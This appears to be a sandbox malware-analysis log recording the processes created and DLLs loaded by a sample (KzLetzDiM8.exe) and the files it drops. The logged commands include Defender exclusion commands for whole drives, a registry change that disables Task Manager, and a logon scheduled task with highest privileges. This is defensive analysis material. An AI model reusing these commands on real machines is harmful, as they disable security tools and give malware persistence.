                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\WmiPrvSE.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Documents\sihost.exe'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe'
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\ComComponentDriverInto.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\h43HaGdPC8.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe
                        Source: unknownProcess created: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe
                        Source: unknownProcess created: C:\Users\Default\Documents\sihost.exe "C:\Users\Default User\Documents\sihost.exe"
                        Source: unknownProcess created: C:\Users\Default\Documents\sihost.exe "C:\Users\Default User\Documents\sihost.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe "C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\fontdriversavescrt\VC6VnT3ED3x5xNRNDrSFzjvQXKeB6kXLUZIf41P3hi0I8ZK.vbe" Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\fontdriversavescrt\EgkshvK6qarKZkry.bat" "Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\fontdriversavescrt\ComComponentDriverInto.exe "C:\fontdriversavescrt/ComComponentDriverInto.exe"Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline"Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/fontdriversavescrt/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Default User\Documents\sihost.exe'" /rl HIGHEST /fJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\WmiPrvSE.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Documents\sihost.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\ComComponentDriverInto.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\h43HaGdPC8.bat" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC076.tmp" "c:\Windows\System32\CSC2AA1D359FACC4CB2A858F49C46B13997.TMP"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe "C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe"
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: dxgidebug.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: dwmapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: riched20.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: usp10.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: msls31.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: version.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: ktmw32.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: dlnashext.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: wpdshext.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: slc.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: version.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: mscoree.dllJump to behavior
